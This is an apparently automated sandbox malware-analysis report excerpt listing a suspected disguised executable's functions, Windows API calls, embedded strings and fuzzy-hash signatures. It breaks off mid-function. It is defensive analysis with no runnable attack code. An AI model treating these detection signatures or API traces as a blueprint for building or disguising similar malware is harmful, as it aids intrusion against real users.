                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                    • Instruction ID: f9ec1f1b9db3d09277ab515e17086e1579d95ef163903d9c3ca279a566254219
                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                    • Instruction Fuzzy Hash: 7B712772A00B17ABEB269F78CC51B5AB3A8BF11364F14C239F514DB285E774D9408BD0
                                                    Function 00384DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00384DF8
                                                    • GetMenuItemInfoW.USER32(00401708,000000FF,00000000,00000030), ref: 00384E59
                                                    • SetMenuItemInfoW.USER32(00401708,00000004,00000000,00000030), ref: 00384E8F
                                                    • Sleep.KERNEL32(000001F4), ref: 00384EA1
                                                    • GetMenuItemCount.USER32(?), ref: 00384EE5
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00384F01
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00384F2B
                                                    • GetMenuItemID.USER32(?,?), ref: 00384F70
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00384FB6
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384FCA
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384FEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: d378823e3cd1fed421390da5fe89ac28e2314a10667eaa8edc53291cced07b77
                                                    • Instruction ID: f8eae1773cd51c497c208419a24b1ed9b175cb637c05b9dc00d02118686e2b56
                                                    • Opcode Fuzzy Hash: d378823e3cd1fed421390da5fe89ac28e2314a10667eaa8edc53291cced07b77
                                                    • Instruction Fuzzy Hash: C9619D7190038AAFDB22EFA4D988EAEBBB8FB05308F15009DF541E7651D770AD05CB20
                                                    Function 003A9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003A9C98
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003A9C9B
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A9CBF
                                                    • _memset.LIBCMT ref: 003A9CD0
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003A9CE2
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003A9D5A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 6fc7789e24b335bb0ff05f42007bafb5ade07a99e396b6ea2fe2016861b3e1a2
                                                    • Instruction ID: 88c2a53fa2e5f4faf5a68c25983d6423f0ced4d6b8da4108986382003952bad3
                                                    • Opcode Fuzzy Hash: 6fc7789e24b335bb0ff05f42007bafb5ade07a99e396b6ea2fe2016861b3e1a2
                                                    • Instruction Fuzzy Hash: 05616C75900208AFDB12DFA8CC81FEEB7B8EB09714F14456AFA05EB2A1D774A941DB50
                                                    Function 003794E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003794FE
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00379549
                                                    • VariantInit.OLEAUT32(?), ref: 0037955B
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0037957B
                                                    • VariantCopy.OLEAUT32(?,?), ref: 003795BE
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 003795D2
                                                    • VariantClear.OLEAUT32(?), ref: 003795E7
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 003795F4
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003795FD
                                                    • VariantClear.OLEAUT32(?), ref: 0037960F
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0037961A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 51b2281123476c38b7c52076589bf53c7b93a57dbb4bb1d5110406138640466a
                                                    • Instruction ID: b338a3304f8b71b133b9f1c2ceb4d15b8eec425c4d374ff84724a7bad3bf2261
                                                    • Opcode Fuzzy Hash: 51b2281123476c38b7c52076589bf53c7b93a57dbb4bb1d5110406138640466a
                                                    • Instruction Fuzzy Hash: BA413231900219AFCB16EFA5D844DDEBB79FF08355F008165F505E7261DB35EA45CBA0
                                                    Function 0039BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h??$|??
                                                    • API String ID: 2862541840-3562383994
                                                    • Opcode ID: 70f7a105ae13d9e2191974b722b46691805e6c80772ca7f4348cd0e4275ce6af
                                                    • Instruction ID: 41de248af1e503785b68e5ab88853378e9c1b47e5dcc4dad4cefc8bc0b083814
                                                    • Opcode Fuzzy Hash: 70f7a105ae13d9e2191974b722b46691805e6c80772ca7f4348cd0e4275ce6af
                                                    • Instruction Fuzzy Hash: F591AF71A00219EBDF26DFA5ED44FAEBBB8EF45710F10815AF505AB280DB709944CFA0
                                                    Function 0039ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • CoInitialize.OLE32 ref: 0039ADF6
                                                    • CoUninitialize.OLE32 ref: 0039AE01
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,003CD8FC,?), ref: 0039AE61
                                                    • IIDFromString.OLE32(?,?), ref: 0039AED4
                                                    • VariantInit.OLEAUT32(?), ref: 0039AF6E
                                                    • VariantClear.OLEAUT32(?), ref: 0039AFCF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: 0265543cc77406468d9eba598f45a234c4c53a59eb37d2e0c49ebf756876f6e7
                                                    • Instruction ID: aae4e7ea496ac5973cc8621ceccf1e6811080026b674f2cad127ac2accde5473
                                                    • Opcode Fuzzy Hash: 0265543cc77406468d9eba598f45a234c4c53a59eb37d2e0c49ebf756876f6e7
                                                    • Instruction Fuzzy Hash: 5D618D71608B11AFDB12EF54C848B6BB7E8AF85714F104619F9869B291C770ED48CBD3
                                                    Function 00398107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00398168
                                                    • inet_addr.WSOCK32(?,?,?), ref: 003981AD
                                                    • gethostbyname.WSOCK32(?), ref: 003981B9
                                                    • IcmpCreateFile.IPHLPAPI ref: 003981C7
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00398237
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0039824D
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003982C2
                                                    • WSACleanup.WSOCK32 ref: 003982C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: 75552721561b5fe304bf5d3300647f5fac84e690563338a62837a281ab8e7be9
                                                    • Instruction ID: 4f8072622970bd81512a563cc2a5eb9cceadf3111dc63f91a242b99c16ba6b79
                                                    • Opcode Fuzzy Hash: 75552721561b5fe304bf5d3300647f5fac84e690563338a62837a281ab8e7be9
                                                    • Instruction Fuzzy Hash: A151A3316047009FDB12AF24CC45F2AB7E8EF89710F044969FA96DB2A1DB70ED05CB41
                                                    Function 003A9E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003A9E5B
                                                    • CreateMenu.USER32 ref: 003A9E76
                                                    • SetMenu.USER32(?,00000000), ref: 003A9E85
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A9F12
                                                    • IsMenu.USER32(?), ref: 003A9F28
                                                    • CreatePopupMenu.USER32 ref: 003A9F32
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A9F63
                                                    • DrawMenuBar.USER32 ref: 003A9F71
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0
                                                    • API String ID: 176399719-4108050209
                                                    • Opcode ID: 9a470bbd4c3691dc63e7b324b0a4a4ea4f590b28b07b44d3fc2eb41feb7cef51
                                                    • Instruction ID: 6150e11410f8eb8504db65be49705843ac65a1964dd8909f1dc3c9c4c8c409d7
                                                    • Opcode Fuzzy Hash: 9a470bbd4c3691dc63e7b324b0a4a4ea4f590b28b07b44d3fc2eb41feb7cef51
                                                    • Instruction Fuzzy Hash: FB417874A00209AFDB12DF64D884FAABBB9FF4A305F15416AF945E7360D731A920CF90
                                                    Function 0038E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038E396
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0038E40C
                                                    • GetLastError.KERNEL32 ref: 0038E416
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0038E483
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: a4cc1cd035be7ac2b4d66974f9969bf6e6536db0fa926171ae642cd3743650dc
                                                    • Instruction ID: 3072312b8407c5aeda912145b0dd692ef36f72ae936478513b600388d63a3cd0
                                                    • Opcode Fuzzy Hash: a4cc1cd035be7ac2b4d66974f9969bf6e6536db0fa926171ae642cd3743650dc
                                                    • Instruction Fuzzy Hash: A7316135A003099FDB03EF65C845EBEB7B8EF45304F1580A5F60AEB291DB70AA01C791
                                                    Function 0037B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0037B98C
                                                    • GetDlgCtrlID.USER32 ref: 0037B997
                                                    • GetParent.USER32 ref: 0037B9B3
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037B9B6
                                                    • GetDlgCtrlID.USER32(?), ref: 0037B9BF
                                                    • GetParent.USER32(?), ref: 0037B9DB
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0037B9DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1383977212-1403004172
                                                    • Opcode ID: 4b9d29d69c9df2be7b5237759b0b1ca4fb98d755919aa7ffac24673b4296e1fa
                                                    • Instruction ID: 03e37f6629e0373f45f9e0a1007a6e04792714ff8ac0730121dd480ca243beef
                                                    • Opcode Fuzzy Hash: 4b9d29d69c9df2be7b5237759b0b1ca4fb98d755919aa7ffac24673b4296e1fa
                                                    • Instruction Fuzzy Hash: A721B675900108BFDF06ABA4CC85EFEBBB9EF46310F504119F665972E1DB786825DB20
                                                    Function 0037B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0037BA73
                                                    • GetDlgCtrlID.USER32 ref: 0037BA7E
                                                    • GetParent.USER32 ref: 0037BA9A
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037BA9D
                                                    • GetDlgCtrlID.USER32(?), ref: 0037BAA6
                                                    • GetParent.USER32(?), ref: 0037BAC2
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0037BAC5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1383977212-1403004172
                                                    • Opcode ID: 31256d9169739137f32a2e54d2b82be0ea53bca2e3db556085af6ae6fad85d28
                                                    • Instruction ID: 2fb1f237e8cc8a8156d48e39e6f6677acb3b4b071bbbd4440fa7bfd37e31caf7
                                                    • Opcode Fuzzy Hash: 31256d9169739137f32a2e54d2b82be0ea53bca2e3db556085af6ae6fad85d28
                                                    • Instruction Fuzzy Hash: 5921C574900108BFDF52AB64CC85FFEBBB9EF45300F504015F955AB1A1DB796926DB20
                                                    Function 0037BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32 ref: 0037BAE3
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0037BAF8
                                                    • _wcscmp.LIBCMT ref: 0037BB0A
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0037BB85
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-3381328864
                                                    • Opcode ID: 55bc6d0753a2cbe1817302a8bedbc83a7067ad8bc3ffb5aa183f06d8573eff55
                                                    • Instruction ID: 6b9083ba7449aa78859dc530dffbd81aa14e1b75806c8e9011a97dec092bda71
                                                    • Opcode Fuzzy Hash: 55bc6d0753a2cbe1817302a8bedbc83a7067ad8bc3ffb5aa183f06d8573eff55
                                                    • Instruction Fuzzy Hash: C1110676648307FAFA376624DC07EB7B7AC9B11724F208026FE08E90D9EFA5A8118514
                                                    Function 0039B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0039B2D5
                                                    • CoInitialize.OLE32(00000000), ref: 0039B302
                                                    • CoUninitialize.OLE32 ref: 0039B30C
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0039B40C
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0039B539
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0039B56D
                                                    • CoGetObject.OLE32(?,00000000,003CD91C,?), ref: 0039B590
                                                    • SetErrorMode.KERNEL32(00000000), ref: 0039B5A3
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0039B623
                                                    • VariantClear.OLEAUT32(003CD91C), ref: 0039B633
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID:
                                                    • API String ID: 2395222682-0
                                                    • Opcode ID: e37a87ea73b5d0f0cbea53ce83e804b6fc5b2b85e8a8a608f067330beb236986
                                                    • Instruction ID: b872604f87b7b68e653e62c3ff72bc808b18b3cd22d5c024c06f37fcdc284613
                                                    • Opcode Fuzzy Hash: e37a87ea73b5d0f0cbea53ce83e804b6fc5b2b85e8a8a608f067330beb236986
                                                    • Instruction Fuzzy Hash: A6C12271608301AFCB02DF69D984A2BB7E9BF89308F00491DF98ADB251DB71ED05CB52
                                                    Function 0036ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __lock.LIBCMT ref: 0036ACC1
                                                      • Part of subcall function 00367CF4: __mtinitlocknum.LIBCMT ref: 00367D06
                                                      • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                                    • __calloc_crt.LIBCMT ref: 0036ACD2
                                                      • Part of subcall function 00366986: __calloc_impl.LIBCMT ref: 00366995
                                                      • Part of subcall function 00366986: Sleep.KERNEL32(00000000,000003BC,0035F507,?,0000000E), ref: 003669AC
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0036ACED
                                                    • GetStartupInfoW.KERNEL32(?,003F6E28,00000064,00365E91,003F6C70,00000014), ref: 0036AD46
                                                    • __calloc_crt.LIBCMT ref: 0036AD91
                                                    • GetFileType.KERNEL32(00000001), ref: 0036ADD8
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0036AE11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1426640281-0
                                                    • Opcode ID: 08fbb81b73af87e912f46505994bb3959535b66de74c1a784bb4484665d63709
                                                    • Instruction ID: 60e966e60c3507fc752cf85fe975ad7c0dab8693eb2919f8498db8d830f7bfeb
                                                    • Opcode Fuzzy Hash: 08fbb81b73af87e912f46505994bb3959535b66de74c1a784bb4484665d63709
                                                    • Instruction Fuzzy Hash: 4881E2B0905B458FDB16CF68C9805A9BBF4AF06324B24826DE4A6BB3D5C7359803CF56
                                                    Function 00384025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00384047
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003830A5,?,00000001), ref: 0038405B
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00384062
